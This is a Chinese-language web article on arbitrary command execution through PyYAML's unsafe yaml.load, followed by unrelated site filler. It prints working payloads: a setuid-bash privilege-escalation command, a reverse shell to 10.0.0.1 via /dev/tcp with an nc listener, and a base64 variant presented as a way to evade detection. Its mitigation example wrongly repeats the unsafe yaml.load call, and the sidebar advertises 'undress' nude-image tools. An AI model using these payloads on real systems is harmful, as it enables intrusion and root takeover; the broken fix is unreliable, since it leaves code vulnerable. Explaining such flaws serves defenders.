Python 中的 YAML(YAML 不是標記語言)函式庫已被確定存在允許在特定條件下執行任意命令的漏洞。此漏洞是由於使用 yaml.load 函數而未指定安全性載入程式而引起的。預設情況下,yaml.load 可以執行任意 Python 對象,這為惡意負載創建了攻擊面。
透過任意指令執行進行利用
根本風險在於反序列化過程。當 YAML 文件包含惡意負載時,yaml.load 會處理嵌入的指令,可能導致程式碼執行。例如,考慮以下程式碼片段:
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
這裡,yaml.load 函數不受限制地解析 example.yml,如果 YAML 內容包含不安全指令,則該函數很容易受到攻擊。典型的漏洞利用負載可以被設計來執行任意系統指令。
有效負載範例
import yaml from yaml import Loader, UnsafeLoader # Malicious payload payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]' # Exploitation yaml.load(payload) yaml.load(payload, Loader=Loader) yaml.load(payload, Loader=UnsafeLoader)
每個呼叫都會處理有效負載,從而在 /tmp/bash 中建立特權可執行檔。然後可以使用提升的權限執行該二進位檔案:
/tmp/bash -p
這表明,如果在權限配置錯誤或存在其他弱點的系統上利用該漏洞,則可能會出現權限提升的可能性。
反向 Shell 攻擊
一個特別陰險的用例是利用該漏洞進行反向 shell。這使得攻擊者能夠遠端存取目標電腦。該過程涉及在攻擊者的電腦上啟動偵聽器並製作旨在建立反向連接的 YAML 文件。
在攻擊者的機器上,啟動 Netcat 監聽器:
nc -lvnp 1234
在目標系統上,以 root 身分執行以下 Python 腳本:
import yaml # Reverse shell payload data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]' yaml.load(data) # Executes the reverse shell
此有效負載指示目標電腦連接回攻擊者的偵聽器,提供具有執行程序權限的完全互動式 shell。
用於混淆的 Base64 編碼
要繞過基本的安全控製或過濾器,有效負載可以進行 Base64 編碼。此方法增加了一層混淆,可能會逃避靜態分析工具的偵測。
例子
from base64 import b64decode import yaml # Base64-encoded payload encoded_payload = b"ISFweXRa...YXNoIl0=" # Truncated for brevity payload = b64decode(encoded_payload) # Execute the payload yaml.load(payload)
緩解技術
專業人員必須採用嚴格的編碼實務來消除此類漏洞。建議的緩解措施包括:
-
使用安全性載入器:將 yaml.load 替換為 yaml.safe_load,這樣可以防止執行任意物件。
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
限制輸入來源:確保 YAML 輸入經過淨化並且僅來自可信來源。
應用靜態分析:使用工具掃描程式碼庫是否有不安全的 yaml.load 呼叫。
環境強化:限制系統權限以最大程度地減少利用的影響。例如,使用容器化環境限制了攻擊者提升權限的能力。
YAML 函式庫的預設行為體現了與 Python 等動態類型語言中的反序列化相關的風險。利用此漏洞所需的複雜程度極低,因此它成為安全應用程式開發的高優先級問題。採用安全的編碼實踐以及強大的輸入驗證和運行時保護措施對於有效減輕這些風險至關重要。
以上是在 Python 中使用 YAML 時要小心!可能存在安全漏洞的詳細內容。更多資訊請關注PHP中文網其他相關文章!

每天學習Python兩個小時是否足夠?這取決於你的目標和學習方法。 1)制定清晰的學習計劃,2)選擇合適的學習資源和方法,3)動手實踐和復習鞏固,可以在這段時間內逐步掌握Python的基本知識和高級功能。

Python在Web開發中的關鍵應用包括使用Django和Flask框架、API開發、數據分析與可視化、機器學習與AI、以及性能優化。 1.Django和Flask框架:Django適合快速開發複雜應用,Flask適用於小型或高度自定義項目。 2.API開發:使用Flask或DjangoRESTFramework構建RESTfulAPI。 3.數據分析與可視化:利用Python處理數據並通過Web界面展示。 4.機器學習與AI:Python用於構建智能Web應用。 5.性能優化:通過異步編程、緩存和代碼優

Python在開發效率上優於C ,但C 在執行性能上更高。 1.Python的簡潔語法和豐富庫提高開發效率。 2.C 的編譯型特性和硬件控制提升執行性能。選擇時需根據項目需求權衡開發速度與執行效率。

Python在現實世界中的應用包括數據分析、Web開發、人工智能和自動化。 1)在數據分析中,Python使用Pandas和Matplotlib處理和可視化數據。 2)Web開發中,Django和Flask框架簡化了Web應用的創建。 3)人工智能領域,TensorFlow和PyTorch用於構建和訓練模型。 4)自動化方面,Python腳本可用於復製文件等任務。

Python在數據科學、Web開發和自動化腳本領域廣泛應用。 1)在數據科學中,Python通過NumPy、Pandas等庫簡化數據處理和分析。 2)在Web開發中,Django和Flask框架使開發者能快速構建應用。 3)在自動化腳本中,Python的簡潔性和標準庫使其成為理想選擇。

Python的靈活性體現在多範式支持和動態類型系統,易用性則源於語法簡潔和豐富的標準庫。 1.靈活性:支持面向對象、函數式和過程式編程,動態類型系統提高開發效率。 2.易用性:語法接近自然語言,標準庫涵蓋廣泛功能,簡化開發過程。

Python因其簡潔與強大而備受青睞,適用於從初學者到高級開發者的各種需求。其多功能性體現在:1)易學易用,語法簡單;2)豐富的庫和框架,如NumPy、Pandas等;3)跨平台支持,可在多種操作系統上運行;4)適合腳本和自動化任務,提升工作效率。

可以,在每天花費兩個小時的時間內學會Python。 1.制定合理的學習計劃,2.選擇合適的學習資源,3.通過實踐鞏固所學知識,這些步驟能幫助你在短時間內掌握Python。


熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

AI Hentai Generator
免費產生 AI 無盡。

熱門文章

熱工具

VSCode Windows 64位元 下載
微軟推出的免費、功能強大的一款IDE編輯器

記事本++7.3.1
好用且免費的程式碼編輯器

MinGW - Minimalist GNU for Windows
這個專案正在遷移到osdn.net/projects/mingw的過程中,你可以繼續在那裡關注我們。 MinGW:GNU編譯器集合(GCC)的本機Windows移植版本,可自由分發的導入函式庫和用於建置本機Windows應用程式的頭檔;包括對MSVC執行時間的擴展,以支援C99功能。 MinGW的所有軟體都可以在64位元Windows平台上運作。

WebStorm Mac版
好用的JavaScript開發工具

SublimeText3 Linux新版
SublimeText3 Linux最新版